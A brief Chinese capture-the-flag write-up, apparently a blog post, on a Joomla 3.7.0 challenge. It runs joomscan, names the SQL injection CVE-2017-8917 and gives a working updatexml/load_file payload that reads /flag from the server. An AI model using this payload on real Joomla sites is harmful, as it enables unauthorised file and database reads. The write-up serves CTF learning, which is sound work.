Joomla Writeup
- joomla的cms系统,可以使用joomscan来探测信息
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl -u http://whalwl.site:8039/
扫描得到系统版本: Joomla 3.7.0
后台地址:/administrator/
通过对Joomla 3.7.0版本查找,发现存在一个注入漏洞cve-2017-8917
mysql root用户,根据题目提示直接读取文件
pyload如下:
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,load_file(0x2f666c6167)),1)
0x2f666c6167
是/flag
得hex编码
本文来自博客园,作者:jzking121,转载请注明原文链接:https://www.cnblogs.com/jzking121/p/15581577.html